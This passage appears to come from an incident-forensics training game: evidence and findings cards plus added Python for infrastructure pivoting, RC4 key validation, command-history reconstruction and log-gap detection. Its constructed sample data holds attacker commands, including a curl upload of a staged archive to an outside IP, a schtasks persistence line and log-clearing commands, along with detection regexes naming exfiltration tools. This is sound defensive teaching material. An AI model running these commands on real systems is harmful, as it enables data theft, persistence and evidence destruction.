║ - Look for connections to known threat groups                  ║
║ - Check if infrastructure used in other campaigns              ║
║ - Contact registrar and hosting for takedown (time it with     ║
║   containment; takedown tips the attacker off)                 ║
║ - Report to ISP for blocking/monitoring"                       ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters:                                     ║
║ - Attribution: +30% (infrastructure often linked to groups)    ║
║ - Attack Chain: +15% (understanding attacker preparation)      ║
║ - Timeline: +10% (infrastructure registration dates)           ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules:                                            ║
║ → HARDENING: "Block all known C2 infrastructure via firewall"  ║
║ → AUDIT: "Threat intelligence integration for blocking"        ║
║ → THREAT INTEL: Shareable with industry, law enforcement       ║
╚════════════════════════════════════════════════════════════════╝

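Building the "infrastructure web" EVD-07 describes is a pivoting exercise: two domains that share a resolved IP, a registrar or an ASN may share an owner, but only if the shared attribute is rare enough to mean something. The script below is an added example for this edition, not the game's own material. It clusters constructed passive-DNS/WHOIS observations (the card's three domains plus unrelated ones) with a union-find over shared attributes, and refuses to pivot on any attribute seen on more than an assumed number of domains, so a large registrar does not glue everything together. The domains other than the card's three, the IPs and the fan-out threshold are all invented for the example.

```python
"""Infrastructure pivoting for EVD-07: link domains that share an IP,
registrar or ASN into clusters, but refuse to pivot on attributes so common
(a big registrar, a cloud ASN) that they would tie unrelated sites together.
Observations are constructed to mirror passive DNS and WHOIS output."""
from collections import defaultdict

# (domain, resolved_ip, registrar, asn, registered) - constructed.
OBS = [
    ("checkupdate.ru",     "192.0.2.45",    "registrar.ru",   "AS64512", "2023-11-02"),
    ("update-service.xyz", "192.0.2.46",    "registrar.ru",   "AS64512", "2024-01-15"),
    ("update-service.xyz", "192.0.2.45",    "registrar.ru",   "AS64512", "2024-01-15"),
    ("files.example.net",  "192.0.2.47",    "registrar.ru",   "AS64512", "2024-03-09"),
    ("shop.example.org",   "198.51.100.20", "bigreg.example", "AS64496", "2019-05-01"),
    ("blog.example.org",   "198.51.100.21", "bigreg.example", "AS64496", "2021-07-07"),
    ("cdn.example.com",    "203.0.113.5",   "bigreg.example", "AS64500", "2018-02-02"),
    ("mail.example.com",   "203.0.113.6",   "bigreg.example", "AS64500", "2020-06-30"),
]
# Assumed: an attribute shared by more than this many domains is too common
# to be evidence of shared ownership.
MAX_FANOUT = 3


def shared_pivots(obs, max_fanout=MAX_FANOUT):
    """{(kind, value): {domains}} for attributes shared by 2..max_fanout domains."""
    users = defaultdict(set)
    for dom, ip, reg, asn, _date in obs:
        for key in (("ip", ip), ("registrar", reg), ("asn", asn)):
            users[key].add(dom)
    return {k: v for k, v in users.items() if 1 < len(v) <= max_fanout}


def cluster(obs, max_fanout=MAX_FANOUT):
    """Union-find over shared pivots; clusters sorted by earliest registration."""
    parent = {}

    def find(x):
        parent.setdefault(x, x)
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    pivots = shared_pivots(obs, max_fanout)
    for doms in pivots.values():
        first, *rest = sorted(doms)
        for d in rest:
            parent[find(d)] = find(first)
    registered = {dom: date for dom, _, _, _, date in obs}
    groups = defaultdict(lambda: {"domains": set(), "pivots": set(), "first_seen": "9999"})
    for dom, date in registered.items():
        g = groups[find(dom)]
        g["domains"].add(dom)
        g["first_seen"] = min(g["first_seen"], date)
    for key, doms in pivots.items():
        groups[find(next(iter(doms)))]["pivots"].add("%s=%s" % key)
    return sorted(({"domains": sorted(g["domains"]), "pivots": sorted(g["pivots"]),
                    "first_seen": g["first_seen"]} for g in groups.values()),
                  key=lambda g: g["first_seen"])


if __name__ == "__main__":
    for g in cluster(OBS):
        print(g["first_seen"], g["domains"], "via", g["pivots"])
```

Each cluster carries the pivots that formed it, so the analyst can see that the card's three domains are tied by a shared historical IP, a small registrar and an ASN together, while the two example.org sites are linked by an ASN alone, which is weak evidence on its own.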
EVD-08: Encryption Keys Recovered

╔════════════════════════════════════════════════════════════════╗
║              EVD-08: ENCRYPTION KEYS RECOVERED                 ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Malware & Persistence                                    ║
║ MITRE ATT&CK: T1140 (Deobfuscate/Decode), T1552 (Unsecured     ║
║              Credentials), T1573 (Encrypted Channel)           ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Encryption keys recovered from memory, disk, or malware code   ║
║ that allow decryption of:                                      ║
║ - Malware traffic (C2 communications)                          ║
║ - Stolen data archives (what was exfiltrated)                  ║
║ - Attacker staging servers (only with legal authority; logging ║
║   into their box yourself is unauthorized access)              ║
║ - Backdoor communications (understanding commands)             ║
║                                                                ║
║ Examples:                                                      ║
║ - AES-256 key found in malware binary                          ║
║ - RC4 key in process memory (used for C2)                      ║
║ - TLS certificates for backdoor listener                       ║
║ - Steganography keys (hidden messages in files)                ║
║                                                                ║
║ What It Reveals:                                               ║
║ - Encryption strength (real cipher vs. XOR obfuscation)        ║
║ - Attacker sophistication (poor key management = careless)     ║
║ - What data can be decrypted (scope of analysis)               ║
║ - Backdoor capabilities (understanding command set)            ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: MODERATE ⚠                                   ║
║ - Keys extracted from memory/binary must be documented         ║
║ - Extraction methodology must be explained                     ║
║ - Cross-referencing with code/behavior confirms validity       ║
║ - Admissible with supporting analysis documentation            ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source:                                              ║
║ - MEM-02: Deep memory analysis finds encryption keys           ║
║ - DISK-02: File carving recovers keys from slack space         ║
║ - MALW-02: Static analysis finds hardcoded keys                ║
║ - MALW-01: Dynamic analysis reveals keys generated at runtime  ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead:                                            ║
║ "We recovered encryption keys! This is huge because:           ║
║ - We can decrypt C2 communications (see commands sent)         ║
║ - We can decrypt malware archives (understand what was stolen) ║
║ - We can validate each key against captured traffic (a wrong   ║
║   key yields noise, the right one a parsable message)          ║
║ - Staging-server access goes through law enforcement, not us   ║
║ - We can build stronger attribution (command content)"         ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters:                                     ║
║ - Attack Chain: +25% (understand full communication)           ║
║ - Attribution: +20% (commands reveal attacker objectives)      ║
║ - Timeline: +15% (command history shows action sequence)       ║
║ - Chain of Custody: +15% (encryption is strong evidence)       ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules:                                            ║
║ → HARDENING: "Secure key management practices"                 ║
║ → AUDIT: "Encryption and key management controls"              ║
║ → THREAT INTEL: Keys shared with law enforcement               ║
╚════════════════════════════════════════════════════════════════╝

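EVD-08's chain-of-custody note says a recovered key must be cross-referenced with observed behaviour before it counts. In practice that means trying every candidate string carved from memory against a captured C2 blob and keeping the one that yields a structurally plausible message. The block below is an added example for this edition, not the game's or any malware's code: RC4, still common in commodity C2 and small enough to write inline, is implemented from scratch, a constructed tasking message is encrypted under an invented key, and three candidate keys (two wrong, one right) are tested against it. The JSON-with-a-"cmd"-field plausibility rule is an assumption standing in for whatever format the real sample uses.

```python
"""Key validation for EVD-08: given candidate keys carved from memory and a
captured C2 blob, keep the key whose output is structurally plausible. This
is the 'cross-reference with behaviour' step the card's custody note asks
for. RC4 is implemented inline; traffic and keys are constructed."""
import json
import string


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same op."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # keystream generation + XOR
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


PRINTABLE = set(string.printable.encode())


def looks_like_c2(plain: bytes) -> bool:
    """Plausibility check: mostly printable and parses as a JSON tasking
    with a 'cmd' field (assumed message shape for this example)."""
    if not plain or sum(b in PRINTABLE for b in plain) < 0.95 * len(plain):
        return False
    try:
        msg = json.loads(plain)
    except ValueError:
        return False
    return isinstance(msg, dict) and "cmd" in msg


def validate_keys(candidates, blob):
    """[(key, decoded message)] for each candidate whose decryption passes
    looks_like_c2; a random key produces noise, so expect zero or one hit."""
    hits = []
    for key in candidates:
        plain = rc4(key, blob)
        if looks_like_c2(plain):
            hits.append((key, json.loads(plain)))
    return hits


# Constructed sample: the 'real' key and a captured tasking message.
TRUE_KEY = b"Kq7!p2Zm"
CAPTURED = rc4(TRUE_KEY, json.dumps(
    {"cmd": "ls", "arg": "C:\\Staging", "id": 17}).encode())
# Strings carved from memory that might be keys: junk, a near miss, the key.
CANDIDATES = [b"password", b"Kq7!p2Zn", TRUE_KEY]

if __name__ == "__main__":
    for key, msg in validate_keys(CANDIDATES, CAPTURED):
        print("key %r decrypts to %s" % (key, msg))
```

The near-miss key differing in one byte produces noise just like the junk one, which is the point: a key is validated by what it produces, and the decrypted command content is then what feeds the attribution and timeline meters.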
EVD-09: Attacker Command History

╔════════════════════════════════════════════════════════════════╗
║              EVD-09: ATTACKER COMMAND HISTORY                  ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Attack Activity                                          ║
║ MITRE ATT&CK: T1059 (Command & Scripting Interpreter),         ║
║              T1059.001 (PowerShell)                            ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Recovered history of commands executed by attacker on          ║
║ compromised systems. Shows attacker's actions, objectives,     ║
║ and decision-making process.                                   ║
║                                                                ║
║ Examples:                                                      ║
║ - PowerShell: Get-ADUser -Filter * | Export-Csv C:\temp\ad.csv ║
║ - CMD: dir \\backup-server\share                               ║
║ - Bash: find / -name "*.sql" -o -name "*.db" 2>/dev/null       ║
║                                                                ║
║ What It Reveals:                                               ║
║ - Attacker objectives (looking for what? ad users? databases?) ║
║ - Attacker knowledge (familiar with Windows/Linux/networks)    ║
║ - Attack sophistication (script-kiddie vs. skilled operator)   ║
║ - Targeting (random exploration vs. targeted search)           ║
║ - Timeline (the command sequence shows progression)            ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: STRONG ✓                                     ║
║ - Command history from shell/terminal logs                     ║
║ - PowerShell transcripts and script block logs (Event ID 4104) ║
║ - Memory forensics shows running command buffer                ║
║ - Timestamps document command execution order                  ║
║ - Caveat: .bash_history is written at shell exit and easily    ║
║   disabled; weight it below transcript/4104 evidence           ║
║ - Fully admissible in court                                    ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source:                                              ║
║ - MEM-02: Memory forensics finds recent command buffer         ║
║ - LOG-02: Command execution logging (PowerShell, bash history) ║
║ - DISK-01: Shell history files (.bash_history, PowerShell logs)║
║ - MALW-01: Dynamic analysis shows commands sent to shell       ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead:                                            ║
║ "We have the attacker's command history! This shows us:        ║
║ - What systems they were looking for                           ║
║ - What data they searched for                                  ║
║ - How much time they spent on each system                      ║
║ - When they pivoted to new systems                             ║
║ - When they started exfiltration                               ║
║ - If they set up backdoors or persistence"                     ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters:                                     ║
║ - Timeline: +25% (command timing shows exact sequence)         ║
║ - Attack Chain: +25% (command progression shows phases)        ║
║ - Attribution: +15% (command style/language hints)             ║
║ - Chain of Custody: +10% (strong admissible evidence)          ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules:                                            ║
║ → HARDENING: "PowerShell transcript logging, command audit"    ║
║ → AUDIT: "Verify logging of command execution"                 ║
║ → TRAINING: "Identify what commands should have triggered alerts"║
╚════════════════════════════════════════════════════════════════╝

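The investigative lead on EVD-09 (what they looked for, how long they spent per system, when they pivoted, when exfiltration started) is a reconstruction over timestamped commands. The script below is an added example for this edition, not the game's own material: it orders a constructed set of recovered commands, tags each with the attack phase its pattern suggests, measures dwell time per host and records host-to-host pivots. The phase regexes are an analyst's assumed starting list, and the commands (which reuse the card's own examples) are invented.

```python
"""Command-history reconstruction for EVD-09: order recovered commands, tag
each with the attack phase its pattern suggests, measure dwell time per host
and find the pivots. Commands are constructed for the example; the phase
patterns are an assumed starting list, not a complete taxonomy."""
import re
from datetime import datetime

# Assumed phase patterns on the command line; first match wins.
PHASES = [
    ("persistence", re.compile(r"schtasks|Register-ScheduledTask|crontab|New-Service|\\Run\b", re.I)),
    ("exfiltration", re.compile(r"curl .*-T|Invoke-WebRequest .*-Method\s+Post|scp |ftp ", re.I)),
    ("lateral", re.compile(r"psexec|wmic .*/node|Enter-PSSession|Invoke-Command|net use", re.I)),
    ("discovery", re.compile(r"\bdir\b|\bnet (user|group|view)|Get-ADUser|whoami|ipconfig|nltest", re.I)),
    ("collection", re.compile(r"7z|rar |Compress-Archive|Export-Csv|find / .*-name", re.I)),
]

# (timestamp, host, command) recovered from transcripts/history - constructed.
HISTORY = [
    ("2024-10-15 03:25:10", "DC01", "whoami /all"),
    ("2024-10-15 03:26:02", "DC01", "Get-ADUser -Filter * | Export-Csv C:\\temp\\ad.csv"),
    ("2024-10-15 03:40:10", "DC01", "net use \\\\backup-server\\share /user:admin-user"),
    ("2024-10-15 03:41:05", "BK01", "dir \\\\backup-server\\share"),
    ("2024-10-15 04:10:44", "BK01", "7z a C:\\Staging\\data_backup.7z D:\\Backups\\*.bak"),
    ("2024-10-15 04:55:00", "BK01", "schtasks /create /tn Updater /tr C:\\Staging\\u.exe /sc hourly"),
    ("2024-10-15 05:02:05", "BK01", "curl -T C:\\Staging\\data_backup.7z https://198.51.100.9/up"),
]


def classify(cmd):
    """Attack phase suggested by the command text, or 'unknown'."""
    for phase, pat in PHASES:
        if pat.search(cmd):
            return phase
    return "unknown"


def _t(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def reconstruct(history):
    """Ordered events with phases, dwell minutes per host, pivots between
    hosts and the collapsed phase sequence."""
    events = [{"time": t, "host": h, "cmd": c, "phase": classify(c)}
              for t, h, c in sorted(history, key=lambda r: _t(r[0]))]
    dwell, pivots, phases = {}, [], []
    for i, e in enumerate(events):
        t = _t(e["time"])
        first, last = dwell.get(e["host"], (t, t))
        dwell[e["host"]] = (min(first, t), max(last, t))
        if i and e["host"] != events[i - 1]["host"]:
            pivots.append((events[i - 1]["host"], e["host"], e["time"]))
        if not phases or phases[-1] != e["phase"]:
            phases.append(e["phase"])
    dwell_min = {h: round((b - a).total_seconds() / 60, 1) for h, (a, b) in dwell.items()}
    return {"events": events, "dwell_minutes": dwell_min,
            "pivots": pivots, "phase_sequence": phases}


if __name__ == "__main__":
    r = reconstruct(HISTORY)
    for e in r["events"]:
        print(e["time"], e["host"], e["phase"].ljust(12), e["cmd"])
    print("dwell:", r["dwell_minutes"], "pivots:", r["pivots"])
    print("phases:", " -> ".join(r["phase_sequence"]))
```

Dwell time is measured from the first to the last recovered command on a host, so it is a lower bound: commands that were never logged (or whose history was cleared, see EVD-12) shorten it.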
EVD-10: Malware Behavior Profile

╔════════════════════════════════════════════════════════════════╗
║              EVD-10: MALWARE BEHAVIOR PROFILE                  ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Malware & Persistence                                    ║
║ MITRE ATT&CK: per observed behavior; the example below maps to ║
║              T1036 (Masquerading), T1547.001 (Run Keys), T1071 ║
║              (Application Layer Protocol, the C2 beacon)       ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Complete profile of malware capabilities and behavior based    ║
║ on dynamic analysis in sandbox environment.                    ║
║                                                                ║
║ Profile Contents:                                              ║
║ - File system interactions (creates, modifies, deletes)        ║
║ - Registry modifications (persistence mechanisms)              ║
║ - Process creation (parent-child relationships)                ║
║ - Network communications (DNS queries, HTTP requests, IPs)     ║
║ - API calls (Windows/Linux API usage)                          ║
║ - Anti-analysis techniques (sandbox evasion)                   ║
║                                                                ║
║ Example Output:                                                ║
║ - Name: conhost.exe (masquerading as Windows process)          ║
║ - Creates files: C:\Users\*\AppData\Local\Temp\app.exe         ║
║ - Registry: HKLM\Software\Microsoft\Windows\CurrentVersion\Run ║
║   (persistence)                                                ║
║ - Network: Connects to update.badsite.ru:443 every 15 minutes  ║
║ - Capabilities: Credential harvesting, File encryption, C2     ║
║                                                                ║
║ What It Reveals:                                               ║
║ - Complete malware capabilities                                ║
║ - Attacker operational techniques                              ║
║ - Threat level (spyware vs. ransomware vs. trojan)              ║
║ - Indicators of Compromise (IOCs)                              ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: STRONG ✓                                     ║
║ - Sandbox execution video/logs document behavior               ║
║ - Timestamps and sequence recorded                             ║
║ - Reproducible analysis methodology                            ║
║ - Widely accepted malware analysis evidence                    ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source:                                              ║
║ - MALW-01: Dynamic sandbox analysis produces full profile      ║
║ - MALW-02: Static analysis validates observed behaviors        ║
║ - Combined: Behavior validated against code confirms accuracy  ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead:                                            ║
║ "We have the complete malware profile. Now we can:             ║
║ - Search for all instances of this malware                     ║
║ - Hunt for C2 communications on network                        ║
║ - Search for created files and artifacts                       ║
║ - Link to other malware families (code similarities)"          ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters:                                     ║
║ - Attack Chain: +20% (understand capabilities = understand threat)║
║ - Attribution: +15% (malware signatures match known families)  ║
║ - Timeline: +10% (behavior timing shows operation phase)       ║
║ - Chain of Custody: +10% (sandbox logs are strong evidence)    ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules:                                            ║
║ → HARDENING: "Controls to prevent malware execution"           ║
║ → NETWORK BUILDING: "Detection of malware C2 behaviors"        ║
║ → AUDIT: "EDR/SIEM coverage for malware detection"             ║
╚════════════════════════════════════════════════════════════════╝

EVD-11: File Staging Artifacts

╔════════════════════════════════════════════════════════════════╗
║              EVD-11: FILE STAGING ARTIFACTS                    ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Attack Activity                                          ║
║ MITRE ATT&CK: T1074 (Data Staged), T1005 (Data from Local      ║
║              System)                                           ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Evidence of attacker staging files before exfiltration. Files  ║
║ are collected in a temporary location, compressed, encrypted,  ║
║ then transferred to attacker server.                           ║
║                                                                ║
║ Artifacts Found:                                               ║
║ - Compressed archives (RAR, 7z, ZIP files)                     ║
║ - Deleted archives recoverable from unallocated space          ║
║ - File lists (text files naming what to steal)                 ║
║ - Batch scripts (automated collection scripts)                 ║
║ - Temporary directories with suspicious contents               ║
║                                                                ║
║ Example:                                                       ║
║ - C:\Staging\data_backup.7z (500 MB)                           ║
║ - C:\Staging\files_to_get.txt (list of target files)           ║
║ - C:\Staging\collect.bat (automated collection script)         ║
║                                                                ║
║ What It Reveals:                                               ║
║ - Data that was targeted (from .txt lists)                     ║
║ - Volume of exfiltration (archive size)                        ║
║ - Compression ratio (how much data actually stolen)            ║
║ - Attacker knowledge (knew where sensitive data was)           ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: STRONG ✓                                     ║
║ - File hashes document the staging                             ║
║ - File timestamps show staging timeline                        ║
║ - File content confirms what was staged                        ║
║ - Fully admissible in court                                    ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source:                                              ║
║ - DISK-01/DISK-02: Staging artifacts on disk                   ║
║ - LOG-02: Batch script execution in logs                       ║
║ - MALW-01: Dynamic analysis shows staging process              ║
║ - NET-01: Outbound transfer whose size matches the archive     ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead:                                            ║
║ "Attacker staged specific files. This shows:                   ║
║ - Exact data that was targeted (from staging lists)            ║
║ - Attack planning (targeted vs. random)                        ║
║ - Data sensitivity (what did they prioritize)                  ║
║ - Precision of attack (narrow vs. broad data grab)"            ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters:                                     ║
║ - Attack Chain: +15% (staging phase evidence)                  ║
║ - Timeline: +20% (staging timestamps show prep phase)          ║
║ - Attribution: +10% (precision shows targeting sophistication) ║
║ - Chain of Custody: +10% (file evidence is strong)             ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules:                                            ║
║ → HARDENING: "Data identification and protection (DLP)"        ║
║ → AUDIT: "Data classification and access controls"             ║
║ → DISASTER RECOVERY: "Specific data breach notification"       ║
╚════════════════════════════════════════════════════════════════╝

EVD-12: Anti-Forensics Evidence

╔════════════════════════════════════════════════════════════════╗
║              EVD-12: ANTI-FORENSICS EVIDENCE                   ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Attack Activity                                          ║
║ MITRE ATT&CK: T1070 (Indicator Removal), T1070.006 (Timestomp),║
║              T1485 (Data Destruction)                          ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Evidence that attacker actively tried to cover their tracks    ║
║ using anti-forensics techniques.                               ║
║                                                                ║
║ Anti-Forensics Found:                                          ║
║ - Event log clearing (Clear-EventLog, wevtutil cl); clearing   ║
║   itself leaves Event ID 1102 in the Security log              ║
║ - File timestamp manipulation (timestomping)                   ║
║ - Log overwriting (dd or similar writing zeros over logs)      ║
║ - File shredding (secure deletion of evidence)                 ║
║ - Artifact wiping (CCleaner-style tools, registry key removal) ║
║ - Malware self-deletion after execution                        ║
║                                                                ║
║ What It Reveals:                                               ║
║ - Sophistication (advanced attackers use anti-forensics)       ║
║ - Awareness (attacker knew forensics would be used)            ║
║ - Intent (intentional cover-up vs. accidental trail)           ║
║ - What they're hiding (deleted logs = they knew activities     ║
║   would be suspicious)                                         ║
║ - Attack planning (anti-forensics in playbook = pre-planned)   ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: MODERATE ⚠                                   ║
║ - Evidence is lack of evidence (absences are hard to prove)    ║
║ - Comparison with known baselines shows anomalies              ║
║ - Log deletion tools detected and documented                   ║
║ - Admissible with supporting context (other evidence)          ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source:                                              ║
║ - LOG-01/LOG-02: Gaps in logs (suspicious absences)            ║
║ - DISK-01/DISK-02: Deleted log files, anti-forensic tools     ║
║ - MEM-01/MEM-02: Anti-forensic process running in memory       ║
║ - MALW-01: Dynamic analysis shows self-deletion               ║
║ - MALW-02: Code analysis finds anti-forensic capabilities      ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead:                                            ║
║ "Attacker used anti-forensics. This actually helps because:    ║
║ - Proves attacker sophistication (means skilled opponent)      ║
║ - Indicates intentional harm (not accidental)                  ║
║ - Suggests what they're hiding (what logs were deleted?)       ║
║ - Helps attribution (anti-forensics technique is signature)    ║
║ - Can reconstruct from other sources (memory, network logs)"   ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters:                                     ║
║ - Attribution: +20% (anti-forensic technique is signature)     ║
║ - Attack Chain: +10% (shows post-attack phase)                 ║
║ - Timeline: -10% (anti-forensics makes timeline harder)        ║
║ - Chain of Custody: +5% (proves intentional cover-up)          ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules:                                            ║
║ → HARDENING: "Immutable logging (cloud, WORM storage)"         ║
║ → NETWORK BUILDING: "Centralized log aggregation"              ║
║ → AUDIT: "Log integrity and anti-tampering controls"           ║
╚════════════════════════════════════════════════════════════════╝
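
The "evidence is lack of evidence" point above is easiest to act on with a script. The following is an added example, not a card or tool from the game: it scans a centrally collected log stream (the NETWORK BUILDING feed this card points at) for silences far longer than the host's own baseline cadence and for explicit log-clear events. The log lines are constructed for the example; the log-clear IDs are the real Windows ones (1102 = Security log cleared, 104 = System log cleared). Function names and the `EventID=` line layout are this example's own assumptions.

```python
"""Added example: finding the evidence that is an absence of evidence.
Flags (a) gaps in a host's forwarded log stream that exceed its baseline
cadence and (b) explicit log-clear events. Sample lines are constructed."""
from __future__ import annotations
from datetime import datetime, timedelta
import re
import statistics

# Assumed line layout for this example: "<timestamp> <host> EventID=<id> <message>"
LINE = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) (\S+) EventID=(\d+) (.*)$")
# Real Windows event IDs: 1102 = Security log cleared, 104 = System log cleared.
LOG_CLEARED_IDS = {1102, 104}


def parse(lines):
    """-> list of (timestamp, host, event_id, message), sorted by time; malformed lines skipped."""
    events = []
    for line in lines:
        m = LINE.match(line)
        if m:
            ts, host, eid, msg = m.groups()
            events.append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), host, int(eid), msg))
    return sorted(events)


def find_gaps(events, factor=6.0):
    """Silences longer than factor x the median inter-event interval (the host's baseline)."""
    if len(events) < 3:
        return []
    times = [e[0] for e in events]
    intervals = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    threshold = max(statistics.median(intervals) * factor, 1.0)
    return [(a, b, secs) for a, b, secs in zip(times, times[1:], intervals) if secs > threshold]


def find_clear_events(events):
    """Events that record a log being wiped; everything older than them is gone locally."""
    return [e for e in events if e[2] in LOG_CLEARED_IDS]


def triage(lines, factor=6.0):
    """Human-readable findings for the investigator's notes."""
    events = parse(lines)
    findings = [f"silence of {secs / 60:.0f} min ({a:%H:%M} -> {b:%H:%M}): "
                f"reconstruct from memory/network sources"
                for a, b, secs in find_gaps(events, factor)]
    findings += [f"{host} EventID {eid} at {ts:%H:%M}: {msg}"
                 for ts, host, eid, msg in find_clear_events(events)]
    return findings


# Constructed sample: a workstation that forwards an event every 5 minutes, goes silent
# for 2.5 hours after its collection agent is stopped, then reappears with the local
# Security log wiped (EventID 1102) before normal traffic resumes.
_START = datetime(2024, 3, 1, 8, 0)
_HB = "{ts:%Y-%m-%d %H:%M:%S} ws01 EventID=4688 New Process: C:\\Windows\\System32\\svchost.exe"
SAMPLE_LOG = [_HB.format(ts=_START + timedelta(minutes=5 * i)) for i in range(13)] + [
    "2024-03-01 11:30:00 ws01 EventID=1102 The audit log was cleared",
    _HB.format(ts=datetime(2024, 3, 1, 11, 35)),
    _HB.format(ts=datetime(2024, 3, 1, 11, 40)),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

The baseline is taken from the stream itself (median interval), which is why the Chain of Custody note above insists on a known baseline: a host that only logs twice a day produces "gaps" that mean nothing, so the factor should be tuned per source and the finding always paired with corroborating evidence.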

Findings Cards (4 Total)

These are synthesis cards representing conclusions from forensic findings:

FIND-01: Threat Attribution Report

╔════════════════════════════════════════════════════════════════╗
║              FIND-01: THREAT ATTRIBUTION REPORT                ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Findings/Conclusions                                     ║
║ Triggered When: Attribution Confidence ≥ 70%                   ║
╠════════════════════════════════════════════════════════════════╣
║ FINDING:                                                       ║
║ Attack attributed to [Threat Group Name]                       ║
║ Confidence Level: [70-90% based on evidence]                   ║
║ Associated Techniques: [MITRE ATT&CK TTPs]                     ║
║ Previous Targets: [Industries/organizations previously targeted]║
║ Likely Motivation: [Financial gain, espionage, etc]            ║
║                                                                 ║
║ RECOMMENDATIONS:                                               ║
║ 1. Notify law enforcement (FBI; Interpol via national police)  ║
║ 2. Share intelligence with industry ISACs                      ║
║ 3. Monitor for indicators of re-engagement                     ║
║ 4. Implement defenses targeting group's known TTPs             ║
║                                                                 ║
║ FEEDS INTO MODULES:                                            ║
║ → HARDENING: "Defense-in-depth against attributed group"       ║
║ → AUDIT & COMPLIANCE: "Threat model update with attributed group"║
║ → INCIDENT RESPONSE: "Playbook for future incidents from group"║
╚════════════════════════════════════════════════════════════════╝

FIND-02: Attack Surface Analysis

╔════════════════════════════════════════════════════════════════╗
║              FIND-02: ATTACK SURFACE ANALYSIS                  ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Findings/Conclusions                                     ║
║ Triggered When: Attack Chain ≥ 75%                             ║
╠════════════════════════════════════════════════════════════════╣
║ FINDING:                                                       ║
║ Entry Point: [Method used for initial compromise]              ║
║ Exploited Vulnerability: [CVE, weak auth, configuration gap]   ║
║ Escalation Point: [Where privilege escalation occurred]        ║
║ Lateral Movement Paths: [Systems accessed after pivot]         ║
║                                                                 ║
║ ROOT CAUSE:                                                    ║
║ - [Patch missing, configuration weakness, process gap]         ║
║                                                                 ║
║ RECOMMENDATIONS:                                               ║
║ 1. Patch entry-point vulnerability immediately                ║
║ 2. Implement detection for exploitation attempts               ║
║ 3. Restrict lateral movement (network segmentation)            ║
║ 4. Update architecture to prevent this attack path             ║
║                                                                 ║
║ FEEDS INTO MODULES:                                            ║
║ → HARDENING: "Specific technical hardening measures"           ║
║ → NETWORK BUILDING: "Architecture redesign to block attack path"║
║ → AUDIT: "Control gap remediation"                             ║
╚════════════════════════════════════════════════════════════════╝

FIND-03: Persistence Mechanisms Discovered

╔════════════════════════════════════════════════════════════════╗
║              FIND-03: PERSISTENCE MECHANISMS DISCOVERED        ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Findings/Conclusions                                     ║
║ Triggered When: Multiple persistence artifacts found           ║
╠════════════════════════════════════════════════════════════════╣
║ FINDING:                                                       ║
║ Primary Persistence: [Scheduled task, registry run, etc]       ║
║ Backup Persistence: [Redundant persistence methods]            ║
║ Dormancy: [How long the implant can lie idle before acting]    ║
║                                                                 ║
║ THREAT:                                                        ║
║ Attacker likely still has access (persistence remains active)  ║
║ - Malware calls home regularly (C2 connections)                ║
║ - Can re-establish access if initial access closed             ║
║ - May deploy additional payloads over time                     ║
║                                                                 ║
║ IMMEDIATE ACTIONS:                                             ║
║ 1. Fully remediate all discovered persistence mechanisms       ║
║ 2. Search for backup persistence (often multiple methods)      ║
║ 3. Monitor for re-establishment of access                      ║
║ 4. Assume attacker may have staged additional backdoors        ║
║                                                                 ║
║ FEEDS INTO MODULES:                                            ║
║ → HARDENING: "Persistence prevention and detection"            ║
║ → DISASTER RECOVERY: "Scope of remediation (how deep?)"        ║
